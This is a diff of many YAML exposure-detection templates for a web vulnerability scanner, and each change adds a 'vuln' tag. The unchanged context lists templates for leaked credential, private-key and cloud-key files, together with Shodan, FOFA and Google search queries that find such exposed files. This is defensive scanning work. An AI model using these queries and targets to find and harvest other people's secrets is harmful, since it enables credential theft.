+++ b/http/exposures/configs/rackup-config-ru.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"config.ru" - tags: exposure,files,config,rackup + tags: exposure,files,config,rackup,vuln http: - method: GET diff --git a/http/exposures/configs/rails-database-config.yaml b/http/exposures/configs/rails-database-config.yaml index ce7cdeffaa3..dd82fea9dfd 100644 --- a/http/exposures/configs/rails-database-config.yaml +++ b/http/exposures/configs/rails-database-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,rails + tags: config,exposure,rails,vuln http: - method: GET diff --git a/http/exposures/configs/rakefile-disclosure.yaml b/http/exposures/configs/rakefile-disclosure.yaml index c0fa3773803..f85bf0acf6c 100644 --- a/http/exposures/configs/rakefile-disclosure.yaml +++ b/http/exposures/configs/rakefile-disclosure.yaml @@ -16,7 +16,7 @@ info: vendor: ruby-lang product: ruby shodan-query: html:"Rakefile" - tags: devops,exposure,rakefile,config,ruby,rails + tags: devops,exposure,rakefile,config,ruby,rails,vuln http: - method: GET diff --git a/http/exposures/configs/redis-config.yaml b/http/exposures/configs/redis-config.yaml index 9f521f3cfb2..c60d5d788ad 100644 --- a/http/exposures/configs/redis-config.yaml +++ b/http/exposures/configs/redis-config.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"redis.conf" product: redis vendor: redis - tags: redis,exposure,config + tags: redis,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 99b5ca9e886..d16c93f26ee 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: mongodb,robomongo,disclosure,config,exposure + tags: mongodb,robomongo,disclosure,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/rollup-js-config.yaml b/http/exposures/configs/rollup-js-config.yaml index 826f9a8c8f9..1051b40a288 100644 --- a/http/exposures/configs/rollup-js-config.yaml +++ b/http/exposures/configs/rollup-js-config.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: html:"rollup.config.js" - tags: exposure,devops,cicd,rollupjs + tags: exposure,devops,cicd,rollupjs,vuln http: - method: GET diff --git a/http/exposures/configs/rubocop-config.yaml b/http/exposures/configs/rubocop-config.yaml index 078b629d258..8d04eba85bb 100644 --- a/http/exposures/configs/rubocop-config.yaml +++ b/http/exposures/configs/rubocop-config.yaml @@ -19,7 +19,7 @@ info: shodan-query: html:"rubocop.yml" product: rubocop vendor: rubocop_project - tags: exposure,files,config,ruby + tags: exposure,files,config,ruby,vuln http: - method: GET diff --git a/http/exposures/configs/ruijie-information-disclosure.yaml b/http/exposures/configs/ruijie-information-disclosure.yaml index 91da54625ee..e0a9f37c15c 100644 --- a/http/exposures/configs/ruijie-information-disclosure.yaml +++ b/http/exposures/configs/ruijie-information-disclosure.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: ruijie,config,exposure + tags: ruijie,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/ruijie-nbr1300g-exposure.yaml b/http/exposures/configs/ruijie-nbr1300g-exposure.yaml index b903c8b5a1e..c9a11be74de 100644 --- a/http/exposures/configs/ruijie-nbr1300g-exposure.yaml +++ b/http/exposures/configs/ruijie-nbr1300g-exposure.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: ruijie,exposure + tags: ruijie,exposure,vuln http: - raw: diff --git a/http/exposures/configs/ruijie-phpinfo.yaml b/http/exposures/configs/ruijie-phpinfo.yaml index 7bc46310472..3b73bee6759 100644 --- a/http/exposures/configs/ruijie-phpinfo.yaml +++ b/http/exposures/configs/ruijie-phpinfo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: phpinfo,rujjie,config,exposure,ruijie + tags: phpinfo,rujjie,config,exposure,ruijie,vuln http: - method: GET diff --git a/http/exposures/configs/s3cfg-config.yaml b/http/exposures/configs/s3cfg-config.yaml index 7fe54e06633..f9bdc648d43 100644 --- a/http/exposures/configs/s3cfg-config.yaml +++ b/http/exposures/configs/s3cfg-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: amazon,s3,exposure,config + tags: amazon,s3,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/s3cmd-config.yaml b/http/exposures/configs/s3cmd-config.yaml index 3d6dc493f57..d742fbe33d7 100644 --- a/http/exposures/configs/s3cmd-config.yaml +++ b/http/exposures/configs/s3cmd-config.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: amazon,config,exposure + tags: amazon,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/saia-web-server-info.yaml b/http/exposures/configs/saia-web-server-info.yaml index b622a160911..a4e9466c260 100644 --- a/http/exposures/configs/saia-web-server-info.yaml +++ b/http/exposures/configs/saia-web-server-info.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,config,exposure + tags: edb,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/samba-config.yaml b/http/exposures/configs/samba-config.yaml index 2edf5de1061..98bc2dfbbdd 100644 --- a/http/exposures/configs/samba-config.yaml +++ b/http/exposures/configs/samba-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,smb,samba + tags: config,exposure,smb,samba,vuln http: - method: GET diff --git a/http/exposures/configs/scrutinizer-config.yaml b/http/exposures/configs/scrutinizer-config.yaml index b18f3e6ccfc..73123424263 100644 --- a/http/exposures/configs/scrutinizer-config.yaml +++ b/http/exposures/configs/scrutinizer-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"scrutinizer.yml" - tags: exposure,scrutinizer,config + tags: exposure,scrutinizer,config,vuln http: - method: GET diff --git a/http/exposures/configs/server-private-keys.yaml b/http/exposures/configs/server-private-keys.yaml index 4421dc6bf52..4c024b6ccd8 100644 --- a/http/exposures/configs/server-private-keys.yaml +++ b/http/exposures/configs/server-private-keys.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 47 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/sftp-credentials-exposure.yaml b/http/exposures/configs/sftp-credentials-exposure.yaml index e3ef535b8ca..c30e626537c 100644 --- a/http/exposures/configs/sftp-credentials-exposure.yaml +++ b/http/exposures/configs/sftp-credentials-exposure.yaml @@ -20,7 +20,7 @@ info: github-query: filename:sftp-config.json product: titan_sftp_server vendor: southrivertech - tags: sftp,config,exposure + tags: sftp,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/sftp-deployment-config.yaml b/http/exposures/configs/sftp-deployment-config.yaml index cc700dcf7d1..96337eaf967 100644 --- a/http/exposures/configs/sftp-deployment-config.yaml +++ b/http/exposures/configs/sftp-deployment-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 github-query: filename:deployment-config.json sftp - tags: sftp,atom,config,exposure + tags: sftp,atom,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml index 10e7c43a7c4..f2f827d4c34 100644 --- a/http/exposures/configs/snoop-servlet-exposure.yaml +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: title:"Snoop Servlet" fofa-query: title="Snoop Servlet" - tags: config,exposure,snoop,snoop-servlet + tags: config,exposure,snoop,snoop-servlet,vuln http: - method: GET diff --git a/http/exposures/configs/sphinxsearch-config.yaml b/http/exposures/configs/sphinxsearch-config.yaml index 7dad4e7872f..83506fa3489 100644 --- a/http/exposures/configs/sphinxsearch-config.yaml +++ b/http/exposures/configs/sphinxsearch-config.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 7 - tags: sphinx,sphinxsearch,exposure,config + tags: sphinx,sphinxsearch,exposure,config,vuln http: - method: GET diff --git a/http/exposures/configs/ssh-authorized-keys.yaml b/http/exposures/configs/ssh-authorized-keys.yaml index 79b519bd76e..ea49c52f00c 100644 --- a/http/exposures/configs/ssh-authorized-keys.yaml +++ b/http/exposures/configs/ssh-authorized-keys.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: config,exposure,ssh + tags: config,exposure,ssh,vuln http: - method: GET diff --git a/http/exposures/configs/ssh-known-hosts.yaml b/http/exposures/configs/ssh-known-hosts.yaml index a78eacfd53a..79b61f6bb42 100644 --- a/http/exposures/configs/ssh-known-hosts.yaml +++ b/http/exposures/configs/ssh-known-hosts.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: config,exposure,ssh + tags: config,exposure,ssh,vuln http: - method: GET diff --git a/http/exposures/configs/starnet-dmb-bs-ftp-credentials-disclosure.yaml b/http/exposures/configs/starnet-dmb-bs-ftp-credentials-disclosure.yaml index 73eae56da05..c155a871a56 100644 --- a/http/exposures/configs/starnet-dmb-bs-ftp-credentials-disclosure.yaml +++ b/http/exposures/configs/starnet-dmb-bs-ftp-credentials-disclosure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: (app="STAR_NET-数字标牌系统" || -欢迎! -- BS3.2.02.38447- || icon_hash="-260118452") - tags: starnet,ruijie,ftp,password,exposures + tags: starnet,ruijie,ftp,password,exposures,vuln http: - method: GET diff --git a/http/exposures/configs/stestr-config.yaml b/http/exposures/configs/stestr-config.yaml index f1c3454500b..d23738dd583 100644 --- a/http/exposures/configs/stestr-config.yaml +++ b/http/exposures/configs/stestr-config.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 github-query: filename:stestr.conf - tags: exposure,stestr,config,files + tags: exposure,stestr,config,files,vuln http: - method: GET diff --git a/http/exposures/configs/svnserve-config.yaml b/http/exposures/configs/svnserve-config.yaml index b8da18d872e..e13ff0bfd14 100644 --- a/http/exposures/configs/svnserve-config.yaml +++ b/http/exposures/configs/svnserve-config.yaml @@ -17,7 +17,7 @@ info: google-query: intext:"configuration of the svnserve daemon" product: subversion vendor: apache - tags: config,exposure,svnserve + tags: config,exposure,svnserve,vuln http: - method: GET diff --git a/http/exposures/configs/symfony-database-config.yaml b/http/exposures/configs/symfony-database-config.yaml index cbb8659308f..c96a09f5436 100644 --- a/http/exposures/configs/symfony-database-config.yaml +++ b/http/exposures/configs/symfony-database-config.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure,symfony + tags: config,exposure,symfony,vuln http: - method: GET diff --git a/http/exposures/configs/symfony-profiler.yaml b/http/exposures/configs/symfony-profiler.yaml index 918d14c106d..d802e4e1bde 100644 --- a/http/exposures/configs/symfony-profiler.yaml +++ b/http/exposures/configs/symfony-profiler.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.html:"symfony Profiler" product: symfony vendor: sensiolabs - tags: config,exposure,symfony + tags: config,exposure,symfony,vuln http: - method: GET diff --git a/http/exposures/configs/symfony-security-config.yaml b/http/exposures/configs/symfony-security-config.yaml index c1063b36a24..8a6d4b42b10 100644 --- a/http/exposures/configs/symfony-security-config.yaml +++ b/http/exposures/configs/symfony-security-config.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: config,exposure,symfony + tags: config,exposure,symfony,vuln http: - method: GET diff --git a/http/exposures/configs/tox-ini.yaml b/http/exposures/configs/tox-ini.yaml index a24d98d139b..934d2628149 100644 --- a/http/exposures/configs/tox-ini.yaml +++ b/http/exposures/configs/tox-ini.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"tox.ini" - tags: exposure,config,tox + tags: exposure,config,tox,vuln http: - method: GET diff --git a/http/exposures/configs/vbulletin-path-disclosure.yaml b/http/exposures/configs/vbulletin-path-disclosure.yaml index 8c8ec4a5726..9dc8109dfd9 100644 --- a/http/exposures/configs/vbulletin-path-disclosure.yaml +++ b/http/exposures/configs/vbulletin-path-disclosure.yaml @@ -14,7 +14,7 @@ info: shodan-query: "title:\"vBulletin\"" product: vbulletin vendor: vbulletin - tags: config,exposure,fpd,vbulletin + tags: config,exposure,fpd,vbulletin,vuln flow: http(1) && http(2) http: diff --git a/http/exposures/configs/ventrilo-config.yaml b/http/exposures/configs/ventrilo-config.yaml index d20cfcaf916..887c81996b5 100644 --- a/http/exposures/configs/ventrilo-config.yaml +++ b/http/exposures/configs/ventrilo-config.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true max-request: 1 - tags: ventrilo,config,exposure + tags: ventrilo,config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/vite-config.yaml b/http/exposures/configs/vite-config.yaml index 0d3601f0346..6156ab6f7cc 100644 --- a/http/exposures/configs/vite-config.yaml +++ b/http/exposures/configs/vite-config.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"vite.config.js" - tags: devops,exposure,files,vite,config + tags: devops,exposure,files,vite,config,vuln http: - method: GET diff --git a/http/exposures/configs/web-config.yaml b/http/exposures/configs/web-config.yaml index e2ec8170ec8..844ecd21c51 100644 --- a/http/exposures/configs/web-config.yaml +++ b/http/exposures/configs/web-config.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/webpack-config.yaml b/http/exposures/configs/webpack-config.yaml index 1d8cbab7c89..0ce1fd59444 100644 --- a/http/exposures/configs/webpack-config.yaml +++ b/http/exposures/configs/webpack-config.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"webpack.config.js" product: webpack vendor: webpack.js - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/websheets-config.yaml b/http/exposures/configs/websheets-config.yaml index 4b5223772c1..818e92ac6e4 100644 --- a/http/exposures/configs/websheets-config.yaml +++ b/http/exposures/configs/websheets-config.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 2 - tags: websheets,config,exposure,files + tags: websheets,config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/configs/wgetrc-config.yaml b/http/exposures/configs/wgetrc-config.yaml index 1e0bd30836b..449a1211db8 100644 --- a/http/exposures/configs/wgetrc-config.yaml +++ b/http/exposures/configs/wgetrc-config.yaml @@ -17,7 +17,7 @@ info: shodan-query: html:".wgetrc" product: wget vendor: gnu - tags: devops,exposure + tags: devops,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/wpconfig-aws-keys.yaml b/http/exposures/configs/wpconfig-aws-keys.yaml index e1bc692527f..efa23a5323c 100644 --- a/http/exposures/configs/wpconfig-aws-keys.yaml +++ b/http/exposures/configs/wpconfig-aws-keys.yaml @@ -7,7 +7,7 @@ info: description: AWS S3 keys are exposed. metadata: max-request: 2 - tags: aws,s3,wordpress,disclosure,exposure + tags: aws,s3,wordpress,disclosure,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/xprober-service.yaml b/http/exposures/configs/xprober-service.yaml index 0febbd847ca..2e7f533f438 100644 --- a/http/exposures/configs/xprober-service.yaml +++ b/http/exposures/configs/xprober-service.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,exposure + tags: config,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/yii-debugger.yaml b/http/exposures/configs/yii-debugger.yaml index ce3695be9be..422cfe7d0b0 100644 --- a/http/exposures/configs/yii-debugger.yaml +++ b/http/exposures/configs/yii-debugger.yaml @@ -15,7 +15,7 @@ info: vendor: yii_software product: yii shodan-query: title:"Yii Debugger" - tags: yii,debug,exposure + tags: yii,debug,exposure,vuln http: - method: GET diff --git a/http/exposures/configs/zend-config-file.yaml b/http/exposures/configs/zend-config-file.yaml index a6e19f4efb0..fc0d1082167 100644 --- a/http/exposures/configs/zend-config-file.yaml +++ b/http/exposures/configs/zend-config-file.yaml @@ -7,7 +7,7 @@ info: description: Zend configuration file was exposed. metadata: max-request: 13 - tags: config,exposure,zend,php + tags: config,exposure,zend,php,vuln http: - method: GET diff --git a/http/exposures/files/adcs-certificate.yaml b/http/exposures/files/adcs-certificate.yaml index 48d92331db5..10db0d75fab 100644 --- a/http/exposures/files/adcs-certificate.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 shodan-query: html:"/certenroll" - tags: ad,adcs,exposure,files,web-enrollment,detect + tags: ad,adcs,exposure,files,web-enrollment,detect,vuln http: - method: GET diff --git a/http/exposures/files/angular-json.yaml b/http/exposures/files/angular-json.yaml index 669ce048b45..62bb09f5721 100644 --- a/http/exposures/files/angular-json.yaml +++ b/http/exposures/files/angular-json.yaml @@ -14,7 +14,7 @@ info: shodan-query: - html:"angular.json" - html:"angular-cli.json" - tags: exposure,angularjs,files + tags: exposure,angularjs,files,vuln http: - method: GET diff --git a/http/exposures/files/apache-licenserc.yaml b/http/exposures/files/apache-licenserc.yaml index 40179cdf345..2f1b6a21878 100644 --- a/http/exposures/files/apache-licenserc.yaml +++ b/http/exposures/files/apache-licenserc.yaml @@ -8,7 +8,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,file,apache + tags: exposure,file,apache,vuln http: - method: GET diff --git a/http/exposures/files/apdisk-disclosure.yaml b/http/exposures/files/apdisk-disclosure.yaml index f9b6614eb1c..c22ddc326df 100644 --- a/http/exposures/files/apdisk-disclosure.yaml +++ b/http/exposures/files/apdisk-disclosure.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: html:"Apdisk" - tags: exposure,files,apdisk + tags: exposure,files,apdisk,vuln http: - method: GET diff --git a/http/exposures/files/appsettings-file-disclosure.yaml b/http/exposures/files/appsettings-file-disclosure.yaml index cd3d9fadd9c..d9f180afd78 100644 --- a/http/exposures/files/appsettings-file-disclosure.yaml +++ b/http/exposures/files/appsettings-file-disclosure.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/atom-sync-remote.yaml b/http/exposures/files/atom-sync-remote.yaml index 450b2fa9389..0989cc13625 100644 --- a/http/exposures/files/atom-sync-remote.yaml +++ b/http/exposures/files/atom-sync-remote.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: atom,exposure,config,files + tags: atom,exposure,config,files,vuln http: - method: GET diff --git a/http/exposures/files/auth-json.yaml b/http/exposures/files/auth-json.yaml index 61f078c4e6e..e111bb59309 100644 --- a/http/exposures/files/auth-json.yaml +++ b/http/exposures/files/auth-json.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"auth.json" - tags: devops,exposure,files,auth,config + tags: devops,exposure,files,auth,config,vuln http: - method: GET diff --git a/http/exposures/files/axis-happyaxis.yaml b/http/exposures/files/axis-happyaxis.yaml index 753b14fcb3d..816158837ce 100644 --- a/http/exposures/files/axis-happyaxis.yaml +++ b/http/exposures/files/axis-happyaxis.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 4 - tags: axis,axis2,middleware,exposure,apache,files + tags: axis,axis2,middleware,exposure,apache,files,vuln http: - method: GET diff --git a/http/exposures/files/azure-pipelines-exposed.yaml b/http/exposures/files/azure-pipelines-exposed.yaml index cb250b71ea1..cbaf4691415 100644 --- a/http/exposures/files/azure-pipelines-exposed.yaml +++ b/http/exposures/files/azure-pipelines-exposed.yaml @@ -13,7 +13,7 @@ info: vendor: microsoft product: azure_pipelines_agent shodan-query: html:"azure-pipelines.yml" - tags: config,exposure,azure,microsoft,cloud,devops,files + tags: config,exposure,azure,microsoft,cloud,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/azuredeploy-json.yaml b/http/exposures/files/azuredeploy-json.yaml index 69cb1c5e0f2..15c67219c72 100644 --- a/http/exposures/files/azuredeploy-json.yaml +++ b/http/exposures/files/azuredeploy-json.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body="azuredeploy.json" - tags: azure,exposure,files + tags: azure,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/bitbucket-oauth-exposure.yaml b/http/exposures/files/bitbucket-oauth-exposure.yaml index d629fa2a76c..95379363a02 100644 --- a/http/exposures/files/bitbucket-oauth-exposure.yaml +++ b/http/exposures/files/bitbucket-oauth-exposure.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: exposure,bitbucket,oauth,credentials,misconfig + tags: exposure,bitbucket,oauth,credentials,misconfig,vuln http: - method: GET diff --git a/http/exposures/files/bitbucket-pipelines.yaml b/http/exposures/files/bitbucket-pipelines.yaml index c5ea0deeb95..16271084898 100644 --- a/http/exposures/files/bitbucket-pipelines.yaml +++ b/http/exposures/files/bitbucket-pipelines.yaml @@ -12,7 +12,7 @@ info: vendor: atlassian product: bitbucket shodan-query: html:"bitbucket-pipelines.yml" - tags: exposure,bitbucket,devops,cicd,files + tags: exposure,bitbucket,devops,cicd,files,vuln http: - method: GET diff --git a/http/exposures/files/bower-json.yaml b/http/exposures/files/bower-json.yaml index 78d061bf9e4..5ed463cce82 100644 --- a/http/exposures/files/bower-json.yaml +++ b/http/exposures/files/bower-json.yaml @@ -10,7 +10,7 @@ info: - https://github.com/bower/spec/blob/master/json.md metadata: max-request: 1 - tags: exposure,files,bower + tags: exposure,files,bower,vuln http: - method: GET diff --git a/http/exposures/files/build-properties.yaml b/http/exposures/files/build-properties.yaml index 3309ed781ef..ad480ca68d3 100644 --- a/http/exposures/files/build-properties.yaml +++ b/http/exposures/files/build-properties.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "build.properties" - tags: exposure,config,files + tags: exposure,config,files,vuln http: - method: GET diff --git a/http/exposures/files/bun-lock.yaml b/http/exposures/files/bun-lock.yaml index 7dc89b0329a..0c56c71940b 100644 --- a/http/exposures/files/bun-lock.yaml +++ b/http/exposures/files/bun-lock.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body=="bun.lockb" - tags: exposure,files,node,npm,bun + tags: exposure,files,node,npm,bun,vuln http: - method: GET diff --git a/http/exposures/files/cargo-lock-package.yaml b/http/exposures/files/cargo-lock-package.yaml index 2a256561422..ffce31ef0d6 100644 --- a/http/exposures/files/cargo-lock-package.yaml +++ b/http/exposures/files/cargo-lock-package.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Cargo.lock" - tags: exposure,files,cargo + tags: exposure,files,cargo,vuln http: - method: GET diff --git a/http/exposures/files/cargo-toml-file.yaml b/http/exposures/files/cargo-toml-file.yaml index 806cf8e38d6..dc7e7280cf9 100644 --- a/http/exposures/files/cargo-toml-file.yaml +++ b/http/exposures/files/cargo-toml-file.yaml @@ -14,7 +14,7 @@ info: vendor: rust-lang product: cargo shodan-query: html:"Cargo.toml" - tags: exposure,files,cargo + tags: exposure,files,cargo,vuln http: - method: GET diff --git a/http/exposures/files/cloud-config.yaml b/http/exposures/files/cloud-config.yaml index 4728a73a057..3839a47571d 100644 --- a/http/exposures/files/cloud-config.yaml +++ b/http/exposures/files/cloud-config.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 shodan-query: html:"cloud-config.yml" - tags: exposure,cloud,devops,files + tags: exposure,cloud,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/cold-fusion-cfcache-map.yaml b/http/exposures/files/cold-fusion-cfcache-map.yaml index 307bb2683ad..61145dfeb9e 100644 --- a/http/exposures/files/cold-fusion-cfcache-map.yaml +++ b/http/exposures/files/cold-fusion-cfcache-map.yaml @@ -14,7 +14,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: exposure,coldfusion,adobe,files + tags: exposure,coldfusion,adobe,files,vuln http: - method: GET diff --git a/http/exposures/files/composer-auth-json.yaml b/http/exposures/files/composer-auth-json.yaml index 45cbd123f16..a566112bc9e 100644 --- a/http/exposures/files/composer-auth-json.yaml +++ b/http/exposures/files/composer-auth-json.yaml @@ -14,7 +14,7 @@ info: vendor: getcomposer product: composer google-query: intext:"index of /" ".composer-auth.json" - tags: exposure,devops,files + tags: exposure,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/core-dump.yaml b/http/exposures/files/core-dump.yaml index a208a7535c9..9dfcc018334 100644 --- a/http/exposures/files/core-dump.yaml +++ b/http/exposures/files/core-dump.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: exposure,files,core-dump + tags: exposure,files,core-dump,vuln http: - method: GET diff --git a/http/exposures/files/credentials-json.yaml b/http/exposures/files/credentials-json.yaml index cfdde8f7a66..4ec82b6df81 100644 --- a/http/exposures/files/credentials-json.yaml +++ b/http/exposures/files/credentials-json.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "credentials.json" - tags: google,secret,exposure,files + tags: google,secret,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/crossdomain-xml.yaml b/http/exposures/files/crossdomain-xml.yaml index 998f170ed62..23b165f08a9 100644 --- a/http/exposures/files/crossdomain-xml.yaml +++ b/http/exposures/files/crossdomain-xml.yaml @@ -8,7 +8,7 @@ info: - https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file metadata: max-request: 1 - tags: exposure,generic,files + tags: exposure,generic,files,vuln http: - method: GET diff --git a/http/exposures/files/database-credentials.yaml b/http/exposures/files/database-credentials.yaml index 261b53c74e5..5a4e3644aee 100644 --- a/http/exposures/files/database-credentials.yaml +++ b/http/exposures/files/database-credentials.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 github-query: filename:database_credentials.inc - tags: exposure,database,config,files + tags: exposure,database,config,files,vuln http: - method: GET diff --git a/http/exposures/files/db-schema.yaml b/http/exposures/files/db-schema.yaml index 40cb3e70ba1..3dc3f3c4619 100644 --- a/http/exposures/files/db-schema.yaml +++ b/http/exposures/files/db-schema.yaml @@ -7,7 +7,7 @@ info: description: This file is auto-generated from the current state of the database. metadata: max-request: 3 - tags: exposure,backup,files + tags: exposure,backup,files,vuln http: - method: GET diff --git a/http/exposures/files/db-xml-file.yaml b/http/exposures/files/db-xml-file.yaml index 4fefc7e10a2..93151e71689 100644 --- a/http/exposures/files/db-xml-file.yaml +++ b/http/exposures/files/db-xml-file.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,db,files,exposure + tags: misconfig,db,files,exposure,vuln http: - method: GET diff --git a/http/exposures/files/dbeaver-database-connections.yaml b/http/exposures/files/dbeaver-database-connections.yaml index 325acbc3926..8b974ec0096 100644 --- a/http/exposures/files/dbeaver-database-connections.yaml +++ b/http/exposures/files/dbeaver-database-connections.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 1 - tags: dbeaver,files,exposure + tags: dbeaver,files,exposure,vuln http: - method: GET diff --git a/http/exposures/files/desktop-ini-exposure.yaml b/http/exposures/files/desktop-ini-exposure.yaml index f1a25679ebb..fbabf2aee9f 100644 --- a/http/exposures/files/desktop-ini-exposure.yaml +++ b/http/exposures/files/desktop-ini-exposure.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: 'html:"desktop.ini"' - tags: exposure,config,files + tags: exposure,config,files,vuln http: - method: GET diff --git a/http/exposures/files/django-secret-key.yaml b/http/exposures/files/django-secret-key.yaml index 186dc5d5fd7..2dc3a2306fd 100644 --- a/http/exposures/files/django-secret-key.yaml +++ b/http/exposures/files/django-secret-key.yaml @@ -16,7 +16,7 @@ info: product: django shodan-query: html:settings.py comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.' - tags: django,exposure,files + tags: django,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/dnsmasq-config.yaml b/http/exposures/files/dnsmasq-config.yaml index 5db083d9d60..325a0514c6d 100644 --- a/http/exposures/files/dnsmasq-config.yaml +++ b/http/exposures/files/dnsmasq-config.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body="dnsmasq.conf" && title="index" - tags: exposure,dnsmasq,files,config + tags: exposure,dnsmasq,files,config,vuln http: - method: GET diff --git a/http/exposures/files/docker-cloud.yaml b/http/exposures/files/docker-cloud.yaml index d8603d8f1d3..74af52078b7 100644 --- a/http/exposures/files/docker-cloud.yaml +++ b/http/exposures/files/docker-cloud.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 google-query: intitle:"index of" "docker-cloud.yml" - tags: exposure,cloud,devops,docker,files + tags: exposure,cloud,devops,docker,files,vuln http: - method: GET diff --git a/http/exposures/files/domcfg-page.yaml b/http/exposures/files/domcfg-page.yaml index 1603bd45db4..0d8ad92d411 100644 --- a/http/exposures/files/domcfg-page.yaml +++ b/http/exposures/files/domcfg-page.yaml @@ -9,7 +9,7 @@ info: - https://twitter.com/Wh11teW0lf/status/1295594085445709824 metadata: max-request: 1 - tags: exposure,lotus,files + tags: exposure,lotus,files,vuln http: - method: GET diff --git a/http/exposures/files/ds-store-file.yaml b/http/exposures/files/ds-store-file.yaml index 690470529f3..a8fbc9bc2d8 100644 --- a/http/exposures/files/ds-store-file.yaml +++ b/http/exposures/files/ds-store-file.yaml @@ -9,7 +9,7 @@ info: - 